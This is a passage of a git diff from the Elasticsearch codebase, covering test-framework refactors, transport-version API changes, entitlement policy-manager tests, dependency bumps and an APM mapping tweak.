randomFrom(Random random, NavigableSet<T> set) { + return RandomPicks.randomFrom(random, set); } } diff --git a/test/framework/src/main/java/org/elasticsearch/test/index/IndexVersionUtils.java b/test/framework/src/main/java/org/elasticsearch/test/index/IndexVersionUtils.java index 5bf20b18abc72..db1aaad52bdcb 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/index/IndexVersionUtils.java +++ b/test/framework/src/main/java/org/elasticsearch/test/index/IndexVersionUtils.java @@ -45,12 +45,12 @@ public static IndexVersion getLowestWriteCompatibleVersion() { /** Returns a random {@link IndexVersion} from all available versions. */ public static IndexVersion randomVersion() { - return VersionUtils.randomFrom(random(), ALL_VERSIONS, IndexVersion::fromId); + return VersionUtils.randomFrom(random(), ALL_VERSIONS); } /** Returns a random {@link IndexVersion} from all versions that can be written to.
*/ public static IndexVersion randomWriteVersion() { - return VersionUtils.randomFrom(random(), ALL_WRITE_VERSIONS, IndexVersion::fromId); + return VersionUtils.randomFrom(random(), ALL_WRITE_VERSIONS); } /** Returns a random {@link IndexVersion} from all available versions without the ignore set */ @@ -78,7 +78,7 @@ public static IndexVersion randomVersionBetween(Random random, @Nullable IndexVe versions = versions.headSet(maxVersion, true); } - return VersionUtils.randomFrom(random, versions, IndexVersion::fromId); + return VersionUtils.randomFrom(random, versions); } public static IndexVersion getPreviousVersion() { diff --git a/test/framework/src/main/java/org/elasticsearch/test/junit/listeners/ReproduceInfoPrinter.java b/test/framework/src/main/java/org/elasticsearch/test/junit/listeners/ReproduceInfoPrinter.java index c187c9b822a86..73ae9a39bc076 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/junit/listeners/ReproduceInfoPrinter.java +++ b/test/framework/src/main/java/org/elasticsearch/test/junit/listeners/ReproduceInfoPrinter.java @@ -189,7 +189,14 @@ private ReproduceErrorMessageBuilder appendESProperties() { appendOpt("tests.locale", Locale.getDefault().toLanguageTag()); appendOpt("tests.timezone", TimeZone.getDefault().getID()); appendOpt("tests.distribution", System.getProperty("tests.distribution")); - appendOpt("runtime.java", Integer.toString(Runtime.version().feature())); + if (Runtime.version().build().isPresent() + && ("ea".equalsIgnoreCase(Runtime.version().pre().orElse("")) + || ("rc".equalsIgnoreCase(Runtime.version().pre().orElse(""))))) { + appendOpt("runtime.java", Runtime.version().feature() + "-pre"); + appendOpt("runtime.java.build", Integer.toString(Runtime.version().build().get())); + } else { + appendOpt("runtime.java", Integer.toString(Runtime.version().feature())); + } appendOpt(ESTestCase.FIPS_SYSPROP, System.getProperty(ESTestCase.FIPS_SYSPROP)); return this; } diff --git a/test/framework/src/main/java/org/elasticsearch/test/rest/ESRestTestCase.java b/test/framework/src/main/java/org/elasticsearch/test/rest/ESRestTestCase.java index 04c2ff20627a7..ef72094c82f1e 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/rest/ESRestTestCase.java +++ b/test/framework/src/main/java/org/elasticsearch/test/rest/ESRestTestCase.java @@ -30,7 +30,6 @@ import org.apache.logging.log4j.Logger; import org.elasticsearch.Build; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.action.admin.cluster.node.tasks.list.TransportListTasksAction; import org.elasticsearch.action.admin.cluster.repositories.put.PutRepositoryRequest; @@ -1227,7 +1226,7 @@ protected static void wipeAllIndices(boolean preserveSecurityIndices) throws IOE try { // remove all indices except some history indices which can pop up after deleting all data streams but shouldn't interfere final List indexPatterns = new ArrayList<>( - List.of("*", "-.ds-ilm-history-*", "-.ds-.slm-history-*", "-.ds-.watcher-history-*") + List.of("*", "-.ds-ilm-history-*", "-.ds-.slm-history-*", "-.ds-.watcher-history-*", "-.ds-.triggered_watches-*") ); if (preserveSecurityIndices) { indexPatterns.add("-.security-*"); @@ -2529,7 +2528,7 @@ protected static TransportVersion minimumTransportVersion() throws IOException { var transportVersion = getTransportVersionWithFallback( objectPath.evaluate("nodes." + id + ".version"), objectPath.evaluate("nodes." 
+ id + ".transport_version"), - () -> TransportVersions.MINIMUM_COMPATIBLE + () -> TransportVersion.minimumCompatible() ); if (minTransportVersion == null || minTransportVersion.after(transportVersion)) { minTransportVersion = transportVersion; diff --git a/test/framework/src/main/java/org/elasticsearch/test/rest/FakeRestRequest.java b/test/framework/src/main/java/org/elasticsearch/test/rest/FakeRestRequest.java index 3cf9255f19803..e55387a715d97 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/rest/FakeRestRequest.java +++ b/test/framework/src/main/java/org/elasticsearch/test/rest/FakeRestRequest.java @@ -117,9 +117,19 @@ public HttpRequest removeHeader(String header) { return new FakeHttpRequest(method, uri, body, filteredHeaders, inboundException); } + public int contentLength() { + return switch (body) { + case HttpBody.Full f -> f.bytes().length(); + case HttpBody.Stream s -> { + var len = header("Content-Length"); + yield len == null ? 0 : Integer.parseInt(len); + } + }; + } + @Override public boolean hasContent() { - return body.isEmpty() == false; + return contentLength() > 0; } @Override @@ -237,6 +247,11 @@ public Builder withBody(HttpBody body) { return this; } + public Builder withContentLength(int length) { + headers.put("Content-Length", List.of(String.valueOf(length))); + return this; + } + public Builder withPath(String path) { this.path = path; return this; diff --git a/test/framework/src/main/java/org/elasticsearch/test/transport/MockTransport.java b/test/framework/src/main/java/org/elasticsearch/test/transport/MockTransport.java index 165f2522c5541..adfe81b96223c 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/transport/MockTransport.java +++ b/test/framework/src/main/java/org/elasticsearch/test/transport/MockTransport.java @@ -22,7 +22,6 @@ import org.elasticsearch.core.Nullable; import org.elasticsearch.core.Tuple; import org.elasticsearch.tasks.TaskManager; -import org.elasticsearch.telemetry.tracing.Tracer; import org.elasticsearch.threadpool.ThreadPool; import org.elasticsearch.transport.CloseableConnection; import org.elasticsearch.transport.ClusterConnectionManager; @@ -74,8 +73,7 @@ public TransportService createTransportService( localNodeFactory, clusterSettings, connectionManager, - new TaskManager(settings, threadPool, taskHeaders), - Tracer.NOOP + new TaskManager(settings, threadPool, taskHeaders) ); } diff --git a/test/framework/src/main/java/org/elasticsearch/test/transport/MockTransportService.java b/test/framework/src/main/java/org/elasticsearch/test/transport/MockTransportService.java index 3f6cf453fd0d1..874b4e6b4bae8 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/transport/MockTransportService.java +++ b/test/framework/src/main/java/org/elasticsearch/test/transport/MockTransportService.java @@ -307,8 +307,7 @@ private MockTransportService( localNodeFactory, clusterSettings, new StubbableConnectionManager(new ClusterConnectionManager(settings, transport, threadPool.getThreadContext())), - taskManager, - Tracer.NOOP + taskManager ); this.original = transport.getDelegate(); this.testExecutor = EsExecutors.newScaling( diff --git a/test/framework/src/main/java/org/elasticsearch/transport/AbstractSimpleTransportTestCase.java b/test/framework/src/main/java/org/elasticsearch/transport/AbstractSimpleTransportTestCase.java index b54e9fca82069..b9d618c7e3ca5 100644 --- a/test/framework/src/main/java/org/elasticsearch/transport/AbstractSimpleTransportTestCase.java +++ 
b/test/framework/src/main/java/org/elasticsearch/transport/AbstractSimpleTransportTestCase.java @@ -15,7 +15,6 @@ import org.elasticsearch.ElasticsearchException; import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.ActionListenerResponseHandler; @@ -2307,7 +2306,7 @@ public void testRegisterHandlerTwice() { public void testHandshakeWithIncompatVersion() { assumeTrue("only tcp transport has a handshake method", serviceA.getOriginalTransport() instanceof TcpTransport); - TransportVersion transportVersion = TransportVersion.fromId(TransportVersions.MINIMUM_COMPATIBLE.id() - 1); + TransportVersion transportVersion = TransportVersion.fromId(TransportVersion.minimumCompatible().id() - 1); try ( MockTransportService service = buildService( "TS_C", @@ -2344,7 +2343,7 @@ public void testHandshakeUpdatesVersion() throws IOException { assumeTrue("only tcp transport has a handshake method", serviceA.getOriginalTransport() instanceof TcpTransport); TransportVersion transportVersion = TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersion.current() ); try ( diff --git a/test/framework/src/main/java/org/elasticsearch/transport/DisruptableMockTransport.java b/test/framework/src/main/java/org/elasticsearch/transport/DisruptableMockTransport.java index a7dac8f727b0c..5a3b1d8faeb21 100644 --- a/test/framework/src/main/java/org/elasticsearch/transport/DisruptableMockTransport.java +++ b/test/framework/src/main/java/org/elasticsearch/transport/DisruptableMockTransport.java @@ -23,7 +23,6 @@ import org.elasticsearch.core.Nullable; import org.elasticsearch.core.Releasables; import org.elasticsearch.tasks.TaskManager; -import org.elasticsearch.telemetry.tracing.Tracer; import org.elasticsearch.test.transport.MockTransport; import org.elasticsearch.threadpool.ThreadPool; @@ -76,8 +75,7 @@ public TransportService createTransportService( interceptor, localNodeFactory, clusterSettings, - new TaskManager(settings, threadPool, taskHeaders), - Tracer.NOOP + new TaskManager(settings, threadPool, taskHeaders) ); } diff --git a/test/framework/src/test/java/org/elasticsearch/bootstrap/TestScopeResolverTests.java b/test/framework/src/test/java/org/elasticsearch/bootstrap/TestScopeResolverTests.java index 24d8f26342797..e489d8dc7a17c 100644 --- a/test/framework/src/test/java/org/elasticsearch/bootstrap/TestScopeResolverTests.java +++ b/test/framework/src/test/java/org/elasticsearch/bootstrap/TestScopeResolverTests.java @@ -13,6 +13,7 @@ import org.elasticsearch.test.ESTestCase; import java.util.List; +import java.util.Set; import static org.hamcrest.Matchers.is; @@ -23,7 +24,7 @@ public void testScopeResolverServerClass() { "server", List.of(new TestBuildInfoLocation("org/elasticsearch/Build.class", "org.elasticsearch.server")) ); - var resolver = TestScopeResolver.createScopeResolver(testBuildInfo, List.of()); + var resolver = TestScopeResolver.createScopeResolver(testBuildInfo, List.of(), Set.of()); var scope = resolver.apply(Plugin.class); assertThat(scope.componentName(), is("(server)")); @@ -39,7 +40,7 @@ public void testScopeResolverInternalClass() { "test-component", List.of(new TestBuildInfoLocation("org/elasticsearch/bootstrap/TestBuildInfoParserTests.class", "test-module-name")) ); - var resolver = 
TestScopeResolver.createScopeResolver(testBuildInfo, List.of(testOwnBuildInfo)); + var resolver = TestScopeResolver.createScopeResolver(testBuildInfo, List.of(testOwnBuildInfo), Set.of("test-component")); var scope = resolver.apply(this.getClass()); assertThat(scope.componentName(), is("test-component")); diff --git a/test/framework/src/test/java/org/elasticsearch/entitlement/runtime/policy/TestPolicyManagerTests.java b/test/framework/src/test/java/org/elasticsearch/entitlement/runtime/policy/TestPolicyManagerTests.java index 1efe76f82c8b5..35a7d29194700 100644 --- a/test/framework/src/test/java/org/elasticsearch/entitlement/runtime/policy/TestPolicyManagerTests.java +++ b/test/framework/src/test/java/org/elasticsearch/entitlement/runtime/policy/TestPolicyManagerTests.java @@ -13,11 +13,17 @@ import org.elasticsearch.test.ESTestCase; import org.junit.Before; +import java.nio.file.Path; +import java.util.Arrays; import java.util.List; import java.util.Map; import java.util.concurrent.atomic.AtomicInteger; +import java.util.stream.Stream; import static org.elasticsearch.entitlement.runtime.policy.PolicyManager.ComponentKind.PLUGIN; +import static org.hamcrest.Matchers.both; +import static org.hamcrest.Matchers.containsString; +import static org.hamcrest.Matchers.equalTo; public class TestPolicyManagerTests extends ESTestCase { TestPolicyManager policyManager; @@ -30,23 +36,45 @@ public void setupPolicyManager() { List.of(), Map.of(), c -> new PolicyScope(PLUGIN, "example-plugin" + scopeCounter.incrementAndGet(), "org.example.module"), - Map.of(), - new TestPathLookup() + new PathLookup() { + @Override + public Path pidFile() { + return null; + } + + @Override + public Stream getBaseDirPaths(BaseDir baseDir) { + return Stream.empty(); + } + + @Override + public Stream resolveSettingPaths(BaseDir baseDir, String settingName) { + return Stream.empty(); + } + + @Override + public boolean isPathOnDefaultFilesystem(Path path) { + return true; + } + }, + List.of(), + List.of() ); + policyManager.setActive(true); } - public void testReset() { - assertTrue(policyManager.moduleEntitlementsMap.isEmpty()); + public void testClearModuleEntitlementsCache() { + assertTrue(policyManager.classEntitlementsMap.isEmpty()); assertEquals("example-plugin1", policyManager.getEntitlements(getClass()).componentName()); assertEquals("example-plugin1", policyManager.getEntitlements(getClass()).componentName()); - assertFalse(policyManager.moduleEntitlementsMap.isEmpty()); + assertFalse(policyManager.classEntitlementsMap.isEmpty()); - policyManager.reset(); + policyManager.clearModuleEntitlementsCache(); - assertTrue(policyManager.moduleEntitlementsMap.isEmpty()); + assertTrue(policyManager.classEntitlementsMap.isEmpty()); assertEquals("example-plugin2", policyManager.getEntitlements(getClass()).componentName()); assertEquals("example-plugin2", policyManager.getEntitlements(getClass()).componentName()); - assertFalse(policyManager.moduleEntitlementsMap.isEmpty()); + assertFalse(policyManager.classEntitlementsMap.isEmpty()); } public void testIsTriviallyAllowed() { @@ -54,6 +82,47 @@ public void testIsTriviallyAllowed() { assertTrue(policyManager.isTriviallyAllowed(org.junit.Before.class)); assertTrue(policyManager.isTriviallyAllowed(PolicyManager.class)); + assertTrue(policyManager.isTriviallyAllowed(getClass())); + policyManager.setTriviallyAllowingTestCode(false); assertFalse(policyManager.isTriviallyAllowed(getClass())); } + + public void testDefaultEntitledTestPackages() { + String[] testPackages = 
policyManager.entitledTestPackages.clone(); + TestPolicyManager.assertNoRedundantPrefixes(testPackages, testPackages, true); + + Arrays.sort(testPackages); + assertThat("Entitled test framework packages are not sorted", policyManager.entitledTestPackages, equalTo(testPackages)); + } + + public void testRejectSetRedundantEntitledTestPackages() { + var throwable = expectThrows(AssertionError.class, () -> policyManager.setEntitledTestPackages("org.apache.lucene.tests")); + var baseMatcher = both(containsString("Redundant prefix entries")); + assertThat(throwable.getMessage(), baseMatcher.and(containsString("org.apache.lucene.tests, org.apache.lucene.tests"))); + + throwable = expectThrows(AssertionError.class, () -> policyManager.setEntitledTestPackages("org.apache.lucene")); + assertThat(throwable.getMessage(), baseMatcher.and(containsString("org.apache.lucene.tests, org.apache.lucene"))); + + throwable = expectThrows(AssertionError.class, () -> policyManager.setEntitledTestPackages("org.apache.lucene.tests.whatever")); + assertThat(throwable.getMessage(), baseMatcher.and(containsString("org.apache.lucene.tests, org.apache.lucene.tests.whatever"))); + + throwable = expectThrows(AssertionError.class, () -> policyManager.setEntitledTestPackages("my.package", "my.package.sub")); + assertThat(throwable.getMessage(), baseMatcher.and(containsString("my.package, my.package.sub"))); + + throwable = expectThrows(AssertionError.class, () -> policyManager.setEntitledTestPackages("trailing.dot.")); + assertThat(throwable.getMessage(), containsString("Invalid package prefix ending with '.' [trailing.dot.]")); + } + + public void testIsTestFrameworkClass() { + String[] sortedPrefixes = { "a.b", "a.bc", "a.c" }; + + assertTrue(TestPolicyManager.isTestFrameworkClass(sortedPrefixes, "a.b")); + assertTrue(TestPolicyManager.isTestFrameworkClass(sortedPrefixes, "a.b.c")); + assertTrue(TestPolicyManager.isTestFrameworkClass(sortedPrefixes, "a.bc")); + assertTrue(TestPolicyManager.isTestFrameworkClass(sortedPrefixes, "a.bc.a")); + + assertFalse(TestPolicyManager.isTestFrameworkClass(sortedPrefixes, "a")); + assertFalse(TestPolicyManager.isTestFrameworkClass(sortedPrefixes, "a.ba")); + assertFalse(TestPolicyManager.isTestFrameworkClass(sortedPrefixes, "a.bcc")); + } } diff --git a/test/framework/src/test/java/org/elasticsearch/test/test/InternalTestClusterTests.java b/test/framework/src/test/java/org/elasticsearch/test/test/InternalTestClusterTests.java index f5c358b3b3301..392ec929e39c3 100644 --- a/test/framework/src/test/java/org/elasticsearch/test/test/InternalTestClusterTests.java +++ b/test/framework/src/test/java/org/elasticsearch/test/test/InternalTestClusterTests.java @@ -85,7 +85,8 @@ public void testInitializiationIsConsistent() { numClientNodes, nodePrefix, Collections.emptyList(), - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); InternalTestCluster cluster1 = new InternalTestCluster( clusterSeed, @@ -99,7 +100,8 @@ public void testInitializiationIsConsistent() { numClientNodes, nodePrefix, Collections.emptyList(), - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); assertClusters(cluster0, cluster1, true); } @@ -198,7 +200,8 @@ public Path nodeConfigPath(int nodeOrdinal) { numClientNodes, nodePrefix, mockPlugins(), - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); cluster0.setBootstrapMasterNodeIndex(bootstrapMasterNodeIndex); @@ -214,7 +217,8 @@ public Path nodeConfigPath(int 
nodeOrdinal) { numClientNodes, nodePrefix, mockPlugins(), - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); cluster1.setBootstrapMasterNodeIndex(bootstrapMasterNodeIndex); @@ -280,7 +284,8 @@ public Path nodeConfigPath(int nodeOrdinal) { numClientNodes, nodePrefix, mockPlugins(), - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); try { cluster.beforeTest(random()); @@ -375,7 +380,8 @@ public Path nodeConfigPath(int nodeOrdinal) { 0, "", mockPlugins(), - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); cluster.beforeTest(random()); List roles = new ArrayList<>(); @@ -467,7 +473,8 @@ public Path nodeConfigPath(int nodeOrdinal) { 0, nodePrefix, plugins, - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); try { cluster.beforeTest(random()); diff --git a/test/immutable-collections-patch/build.gradle b/test/immutable-collections-patch/build.gradle index 852a19116fb71..d444ef8b7af79 100644 --- a/test/immutable-collections-patch/build.gradle +++ b/test/immutable-collections-patch/build.gradle @@ -17,8 +17,8 @@ configurations { } dependencies { - implementation 'org.ow2.asm:asm:9.7.1' - implementation 'org.ow2.asm:asm-tree:9.7.1' + implementation 'org.ow2.asm:asm:9.8' + implementation 'org.ow2.asm:asm-tree:9.8' } def outputDir = layout.buildDirectory.dir("jdk-patches") diff --git a/test/logger-usage/build.gradle b/test/logger-usage/build.gradle index 6d6c5ff889a45..784147aec69cd 100644 --- a/test/logger-usage/build.gradle +++ b/test/logger-usage/build.gradle @@ -10,9 +10,9 @@ apply plugin: 'elasticsearch.java' dependencies { - api 'org.ow2.asm:asm:9.7.1' - api 'org.ow2.asm:asm-tree:9.7.1' - api 'org.ow2.asm:asm-analysis:9.7.1' + api 'org.ow2.asm:asm:9.8' + api 'org.ow2.asm:asm-tree:9.8' + api 'org.ow2.asm:asm-analysis:9.8' api "org.apache.logging.log4j:log4j-api:${versions.log4j}" testImplementation project(":test:framework") } diff --git a/test/test-clusters/src/main/java/org/elasticsearch/test/cluster/FeatureFlag.java b/test/test-clusters/src/main/java/org/elasticsearch/test/cluster/FeatureFlag.java index 8f25ee838b3a0..a23a4b866998b 100644 --- a/test/test-clusters/src/main/java/org/elasticsearch/test/cluster/FeatureFlag.java +++ b/test/test-clusters/src/main/java/org/elasticsearch/test/cluster/FeatureFlag.java @@ -21,7 +21,8 @@ public enum FeatureFlag { DOC_VALUES_SKIPPER("es.doc_values_skipper_feature_flag_enabled=true", Version.fromString("8.18.1"), null), USE_LUCENE101_POSTINGS_FORMAT("es.use_lucene101_postings_format_feature_flag_enabled=true", Version.fromString("9.1.0"), null), IVF_FORMAT("es.ivf_format_feature_flag_enabled=true", Version.fromString("9.1.0"), null), - LOGS_STREAM("es.logs_stream_feature_flag_enabled=true", Version.fromString("9.1.0"), null); + LOGS_STREAM("es.logs_stream_feature_flag_enabled=true", Version.fromString("9.1.0"), null), + PATTERNED_TEXT("es.patterned_text_feature_flag_enabled=true", Version.fromString("9.1.0"), null); public final String systemProperty; public final Version from; diff --git a/test/test-clusters/src/main/java/org/elasticsearch/test/cluster/local/DefaultSettingsProvider.java b/test/test-clusters/src/main/java/org/elasticsearch/test/cluster/local/DefaultSettingsProvider.java index b53f4ece46134..2fdf0df41736a 100644 --- a/test/test-clusters/src/main/java/org/elasticsearch/test/cluster/local/DefaultSettingsProvider.java +++ 
b/test/test-clusters/src/main/java/org/elasticsearch/test/cluster/local/DefaultSettingsProvider.java @@ -42,6 +42,10 @@ public Map get(LocalNodeSpec nodeSpec) { } } + // Limit the number of allocated processors for all nodes in the cluster by default. + // This is to ensure that the tests run consistently across different environments. + settings.put("node.processors", "2"); + // Default the watermarks to absurdly low to prevent the tests from failing on nodes without enough disk space settings.put("cluster.routing.allocation.disk.watermark.low", "1b"); settings.put("cluster.routing.allocation.disk.watermark.high", "1b"); diff --git a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/boxplot/BoxplotAggregationBuilder.java b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/boxplot/BoxplotAggregationBuilder.java index 37e05898dfc48..ef99a55138482 100644 --- a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/boxplot/BoxplotAggregationBuilder.java +++ b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/boxplot/BoxplotAggregationBuilder.java @@ -194,6 +194,6 @@ public Optional> getOutputFieldNames() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/cumulativecardinality/CumulativeCardinalityPipelineAggregationBuilder.java b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/cumulativecardinality/CumulativeCardinalityPipelineAggregationBuilder.java index 08f2011e94e83..05fe35ae9c58f 100644 --- a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/cumulativecardinality/CumulativeCardinalityPipelineAggregationBuilder.java +++ b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/cumulativecardinality/CumulativeCardinalityPipelineAggregationBuilder.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.analytics.cumulativecardinality; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.DocValueFormat; @@ -133,6 +132,6 @@ protected boolean overrideBucketsPath() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/movingPercentiles/MovingPercentilesPipelineAggregationBuilder.java b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/movingPercentiles/MovingPercentilesPipelineAggregationBuilder.java index ae93faa69f2c4..aebae0bcfce09 100644 --- a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/movingPercentiles/MovingPercentilesPipelineAggregationBuilder.java +++ b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/movingPercentiles/MovingPercentilesPipelineAggregationBuilder.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.analytics.movingPercentiles; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.pipeline.AbstractPipelineAggregationBuilder; @@ -134,6 +133,6 @@ protected boolean 
overrideBucketsPath() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/multiterms/MultiTermsAggregationBuilder.java b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/multiterms/MultiTermsAggregationBuilder.java index bc1cd3fa05d52..25f9f576e36b7 100644 --- a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/multiterms/MultiTermsAggregationBuilder.java +++ b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/multiterms/MultiTermsAggregationBuilder.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.analytics.multiterms; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.xcontent.LoggingDeprecationHandler; @@ -394,6 +393,6 @@ public boolean equals(Object obj) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/normalize/NormalizePipelineAggregationBuilder.java b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/normalize/NormalizePipelineAggregationBuilder.java index de32ab9587ef9..0c9c94f45b809 100644 --- a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/normalize/NormalizePipelineAggregationBuilder.java +++ b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/normalize/NormalizePipelineAggregationBuilder.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.analytics.normalize; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.DocValueFormat; @@ -157,6 +156,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/rate/RateAggregationBuilder.java b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/rate/RateAggregationBuilder.java index 0b2d3606854a4..f6e74c46ffa9e 100644 --- a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/rate/RateAggregationBuilder.java +++ b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/rate/RateAggregationBuilder.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.analytics.rate; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.Rounding; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -216,6 +215,6 @@ public int hashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/stringstats/StringStatsAggregationBuilder.java b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/stringstats/StringStatsAggregationBuilder.java index 
ea5a0adffa0eb..67f4fddc7d926 100644 --- a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/stringstats/StringStatsAggregationBuilder.java +++ b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/stringstats/StringStatsAggregationBuilder.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.analytics.stringstats; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -154,6 +153,6 @@ public boolean equals(Object obj) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/topmetrics/TopMetricsAggregationBuilder.java b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/topmetrics/TopMetricsAggregationBuilder.java index 93fd71b55332a..b20bdf4aa52c5 100644 --- a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/topmetrics/TopMetricsAggregationBuilder.java +++ b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/topmetrics/TopMetricsAggregationBuilder.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.analytics.topmetrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AbstractAggregationBuilder; @@ -235,6 +234,6 @@ public Optional> getOutputFieldNames() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/ttest/TTestAggregationBuilder.java b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/ttest/TTestAggregationBuilder.java index bbe497718b62a..0b455d0ba0129 100644 --- a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/ttest/TTestAggregationBuilder.java +++ b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/ttest/TTestAggregationBuilder.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.analytics.ttest; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.query.QueryBuilder; @@ -182,6 +181,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/apm-data/src/main/resources/component-templates/apm@mappings.yaml b/x-pack/plugin/apm-data/src/main/resources/component-templates/apm@mappings.yaml index ac6462c86676c..a5a3a7433f4c1 100644 --- a/x-pack/plugin/apm-data/src/main/resources/component-templates/apm@mappings.yaml +++ b/x-pack/plugin/apm-data/src/main/resources/component-templates/apm@mappings.yaml @@ -4,6 +4,7 @@ _meta: managed: true template: mappings: + date_detection: false dynamic: true dynamic_templates: - numeric_labels: diff --git a/x-pack/plugin/apm-data/src/main/resources/component-templates/metrics-apm@mappings.yaml 
